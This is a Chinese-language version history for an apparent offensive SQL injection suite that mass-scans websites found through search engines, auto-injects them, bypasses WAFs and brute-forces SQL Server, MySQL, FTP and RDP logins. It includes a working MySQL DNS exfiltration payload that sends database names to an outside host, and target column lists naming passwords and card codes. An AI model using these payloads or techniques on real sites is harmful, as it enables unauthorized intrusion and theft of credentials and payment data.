豹子安全

版本历史 - 豹子安全

■ 升级到3.96 版本。

√ 20200724: 在 SQL注入器 中,在 “数据” 选项卡控件 中,在 “条件” 有面的文本框中,有bug。
√ 20200720: 在 SQL注入扫描器 中,应加上 yahoo.co.jp 雅虎日本 的扫描设置。


√ 20200720: 新的服务器验证。
√ 20200704: 在 配置文件里面,应该增加 GET、POST、Cookies 几个单独的选项。应该加上WAF选项:“先把SQL注入语句按单词分割,然后给每一个单词后面加上注释符 (--),然后加上回车换行。”和 “替换 -- 为 # (仅限MySQL)。” --tamper=space2mysqldash



√ 20200704: 在 配置文件里面,应该加上随机的用户代理(User-Agent)。


√ 20200629: 在配置文件加入选项:“使用完整的URL编码,以绕过某些 WAF(Web Application Firewall 网络应用防火墙)。” 。
√ 其它的小改进。

■ 升级到3.95 版本。

√ 20200627: 在 SQL注入扫描器 和 SQL注入器 中,应该对 URL 完全编码, 以绕过某些 WAF。
√ 20200625: 在线密码爆破工具 中, 应该使用线程文件句柄,而不是密码文件的一个文本型变量,用于提高速度,当前速度越往后越慢。
√ 20200624: 在线密码爆破工具 中,要实现多种数据库在线破解工具、FTP远程文件传输协议破解、远程桌面破解。1.SQLServer(1433);2.MySQL(3306);3.FTP(21);4.远程桌面(3389)*;5.HTTP Authorization 认证(80,443) 工具。
√ 20200618: SQL注入扫描器 中,已经扫描的网址已存在于 _works 文件中,则不再扫描该网址,并在 config.exe 文件增加一条“将被扫描的网址已存在于当前文件夹下的 _works 文件夹中,则不再扫描该网址。”的选择框。




■ 升级到3.9 版本。

√ 20200609: SQL注入扫描器 中,设置列表视图上的备注。


√ 20200608: SQL注入扫描器 中,需要将搜索框由文本形式改为下拉式,以下拉的形式出现 序号数字、备注、网页标题等搜索出来的内容。


√ 20200607: SQL注入扫描器 中,已经扫描的网址已存在于库中,则不再扫描该网址,并在 config.exe 文件增加一条“将被扫描的网址已存在于库中,则不再扫描该网址。”的选择框。


√ 其它的小改进。

■ 升级到3.8 版本。

√ 20200530: SQL注入扫描器 中,需要把按钮【菜单↓】左键菜单里面“将[自动注入]设置为"未注入"”。


√ 20200529: SQL注入扫描器 需要增加 [自动注入] 按钮 和 自动注入进度条。 在 SQL注入扫描器 lvSQLInject 列表视图里面,加上四列“自动注入”,以及进度条。




√ 20200508: 在注入器中,给 数据库的用户表和字段 “文本框” 替换的 “下拉组合框”,并在里面添加数据,给用户表添加:
admin,user,customer,member,account,client,secret,password,usr,order,permission,session 等; 给字段添加:
name,password,login,sys,user,account,pwd,passwd,ccv,mail,phone,mobile,fax,address,zip,country,permission,session 等。


√ 其它的小改进。

■ 升级到3.7 版本。

√ 20200502: SQL注入扫描器,数据库管理窗体,在右键菜单中添加一个“删除所有数据库”菜单项。
√ 20200502: SQL注入扫描器,注入“判断方法”为“显错类型(1)”的MySQL数据库。



√ 20200427: MySQL 在 Windows 下 基于DNS 注入有问题 , 应为 select load_file(concat('\\\\dbname.',database(),'.m_-_kalapaikka_-_net.921868.3997bccf4d58c084b256a19.109.ns.0-c.cc\\index.html'));
斜杠搞反了。
√ 20200426: SQL注入扫描器,在网页中浏览的时候,可以单击[后退]和[前进]按钮。
√ 20200426: 在SQL注入中,要在主窗口中加入[复制]和[打开]按钮。
√ 其它的小改进。

■ 升级到3.6 版本。

√ 20200424: SQL注入扫描器,在注入的时候,把搜索出来的链接只要不重复的。
√ 20200423: SQL注入扫描器 注入的之后,要加上响应码的字符描述。HTTPS_ErrorCode_Desc()。


√ 20200422: SQL注入扫描器 注入的时候,就是前面几个是正确的, 后面的不正确。
√ 20200420: SQL注入扫描器 不能注入打不开的网址。
√ 20200418: 给软件授权页面加上[复制]按钮。

■ 升级到3.5 版本。

√ 20200414: 在“关于”和在网站上加上QQ 二维码。


√ 20200413: SQL注入扫描器 需要 [根据 union 查询列数] 或 [根据 order by 查询列数]增加总联合查询(union)参数配置
√ 20200413: 在配置文件中添加单选项:如果有注入点话,仅在SQL注入扫描器中列表视图里面显示一个注入点,然后判断下一个网址。
√ 20200412: SQL注入扫描器中[停止]按钮需要优化。
√ 20200412: 注入列表右键加上菜单“搜索此注入点” 和 “全部显示” 。


√ 20200410: 要根据配置文件选项(config.ini),采用 “cbbScanGET_POST_Cookies=整数型。探测 GET/POST/Cookie 。 1.GET;2.GET 和 POST;3.GET、POST 和 Cookie 。默认为 1 。” 来进行探测。
√ 20200410: 在SQL扫描器中导入网址文件加快,并且使用了线程。


√ 20200409: SQL注入扫描器 需要在"SQL表格日志"面板 中增加 HTTP 响应头的大小 、 HTTP 响应体的大小 和 整个HTTP的整个文本大小。
√ 20200409: 豹子安全(leosec.exe)里面, 应该增加当前文件位置。


√ 20200408: 要在配置工具里面增加 下拉框, 表示 容易、中等、难。如果您为小白,建议使用“容易”;如果为高手,建议使用“难”。这里“注入器难度”有变化的时候,下面几个都有变化。


√ 20200404 在 “SQL表格日志”面板 中的右键菜单 【查看选中的】, 出现调用栈错误,查明原因,是因为要在工程文件中显示出来。原来是没有显示。

■ 升级到 豹子安全 3.4 版本。

√ 2020-03-20 敏感文件扫描器不再“运行时输出”了, 已解决。
√ 2020-03-19 在"请求转发后的URL为:" 后面的网址处, 偶尔会发现__sql__,原因可能是应为 HTTP请求头中没有?符号。已解决。
√ 2020-03-18 在某些情况下,请求转发器CPU占用很高。已解决CPU占用。

■ 升级到 豹子安全 3.3 版本。

√ 2020-03-17 19:29 要处理数据库名、表名、字段名在SQL注入语句中为原样字符。 现在处于大小写混用的状态。主要是 Linux 这样要求的。
√ 2020-03-16 在 “配置工具”中,添加单选项,“□探测'[未知的数据库]'”的,用于加速探测速度。
√ 2020-03-15 将用户界和网站面变成金色和红色。
√ 2020-03-11 20:26 增加 “请求转发器”,一项高级工具,需要懂SQL语句才能很好的运用它。
√ 多处bugs修复。
√ 2019-09-30 DNS MySQL 写文件窗体 和 读文件窗体。
√ 2019-09-25 MySQLWriteFile.aardio MySQL 写文件窗体。ReadFileForm.aardio MySQL 读文件窗体。
√ 2019-09-19 DNS 注入iCount 有问题。
√ 2019-09-19 injections 注入语句部分函数。
√ 2019-09-17 sAllSQLFragment="0x64617461"; //todo: data=>0x64617461
√ 2019-09-16 在 SQLInjectionTest/MySQL/news.php里面,原来的数据库的问题。已搞定。
请见有道云笔记 的《MySQL SQL error #1271 - Illegal mix of collations for operation 'UNION'》

豹子安全 © 2020
www.leosec.net
www.leosec.org
www.leopardsec.com
QQ: 1497683687
微信:leosec_net
Tox ID: leosec.net@hotmail.com
QQ: 1497683687
微信:leosec_net
Tox ID